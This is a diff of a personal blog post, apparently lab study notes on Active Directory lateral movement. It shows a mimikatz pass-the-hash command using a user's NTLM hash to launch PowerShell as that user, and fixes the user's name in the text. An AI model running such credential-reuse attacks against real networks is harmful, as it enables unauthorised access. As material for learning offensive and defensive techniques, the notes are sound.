ST4RGUARD/ST4RGUARD.github.io/_posts/2023-09-29-AD_lat_movmnt-cont.md

     mimikatz# sekurlsa::pth /user:jim /domain:corp.com /ntlm:369def79d8372408bf6e93364cc93075 /run:powershell

-this allows us to run a powershell process as jen
+this allows us to run a powershell process as jim

+### NOTE whoami might show the original user but we are still jim

 now in the PS prompt